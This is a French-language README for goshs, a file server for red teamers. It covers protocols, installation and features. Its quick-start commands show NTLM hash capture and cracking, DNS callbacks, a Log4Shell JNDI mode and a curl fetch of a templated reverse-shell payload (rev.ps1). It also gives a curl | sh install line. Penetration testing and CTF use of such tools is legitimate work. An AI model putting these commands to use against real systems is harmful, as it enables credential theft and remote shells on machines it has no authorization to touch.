
goshs v2.1.5
Serveur de fichiers à binaire unique riche en fonctionnalités pour red teamers et développeurs. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · Capture de hash NTLM · Rappels DNS/SMTP · TLS · Authentification · Liens de partage. Un puissant remplacement de python3 -m http.server.
Vous êtes en pleine mission. Vous devez transférer un fichier, capturer un hash SMB, ou monter rapidement un serveur HTTPS — et python3 -m http.server ne suffit pas.
goshs est un serveur de fichiers binaire unique conçu pour les moments où vous avez besoin de plus que SimpleHTTPServer de Python sans vouloir configurer Apache. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, authentification basique, liens de partage, rappels DNS/SMTP, capture et cassage de hash NTLM — le tout en une seule commande.


Démo
Essayez par vous-même : demo.goshs.de

Démarrage rapide
# Serve the current directory on port 8000
goshs
# Serve with HTTPS (self-signed) and basic auth
goshs -s -ss -b user:password
# Capture SMB hashes
goshs -smb -smb-domain CORP
# Capture LDAP credentials and NTLM hashes (with optional wordlist cracking)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# Catch DNS callbacks and receive emails
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain your-domain.com
# Self-destruct after 2 hours
goshs --ttl 2h
# Run with the interactive terminal dashboard (great for headless SSH sessions)
goshs --tui
# Serve payloads that auto-fill your callback host/port at download time
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# fetch rendered: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Documentation
Pour une documentation détaillée, rendez-vous sur docs.goshs.de
Fonctionnalités
| 📁 Opérations sur les fichiers | Téléchargement (reprise et recherche possible via HTTP Range), téléversement (glisser-déposer, POST/PUT), suppression, ZIP groupé, codes QR |
| 🔌 Protocoles | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Authentification et sécurité | Authentification basique, authentification par certificat, TLS (auto-signé, Let's Encrypt, certificat personnalisé), liste blanche IP, ACL basées sur les fichiers |
| ⚙️ Modes serveur | Lecture seule, téléversement uniquement, pas de suppression, silencieux, invisible, exécution de commandes CLI, autodestruction avec TTL |
| 🔗 Liens de partage | Partage basé sur un jeton, limite de téléchargement, limite de temps |
| 🎯 Collaboration / CTF | Serveur DNS, serveur SMTP, capture et cassage de hash NTLM SMB, capture d'identifiants LDAP + cassage de hash NTLM (mode JNDI pour Log4Shell), endpoint de redirection, récupérateur de shell inversé + générateur de payload |
| 🧩 Modèles de payload | Rendre les valeurs {{.LHOST}}/{{.LPORT}} + valeurs --tpl-var personnalisées dans les fichiers servis à la demande (?tpl) |
| 🔔 Intégration | Webhooks, tunnel via localhost.run, fichier de configuration, API JSON, mDNS |
| 🖥️ Tableau de bord TUI | Tableau de bord terminal interactif plein écran ; volets en direct pour HTTP, DNS, SMB, LDAP, SMTP, shells inversés et presse-papiers ; attacher et mettre à niveau des shells depuis le terminal |
| 🛠️ Divers | Thèmes clair/sombre, presse-papiers, auto-mise à jour, sortie de logs, intégration de fichiers, abandon de privilèges |
Installation
| Méthode | |
|---|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali & Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Release | Télécharger depuis GitHub Releases |
🐚 Complétion de shell
goshs peut installer la complétion par tabulation pour bash, fish et zsh :
goshs --completion bash
goshs --completion fish
goshs --completion zsh
Sur macOS avec Homebrew, le chemin Homebrew correct est utilisé automatiquement. Après l'installation, la commande affiche une instruction d'activation exacte, par exemple :
source ~/.local/share/bash-completion/completions/goshs
🔧 Compiler vous-même
Les ressources web intégrées sont validées, donc une compilation simple fonctionne :
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Si vous modifiez les sources JavaScript ou SCSS, reconstruisez d'abord les ressources avec esbuild et sass installés :
make generate
go build -o goshs .
Contributeurs de code
Contributeurs de sécurité
Voici les super contributeurs qui ont rendu goshs encore plus sécurisé ❤️
Communauté
Rejoignez la communauté Discord et commencez à vous connecter.
Historique des étoiles
Crédits
Un remerciement spécial à sc0tfree pour avoir inspiré ce projet avec son projet updog écrit en Python.








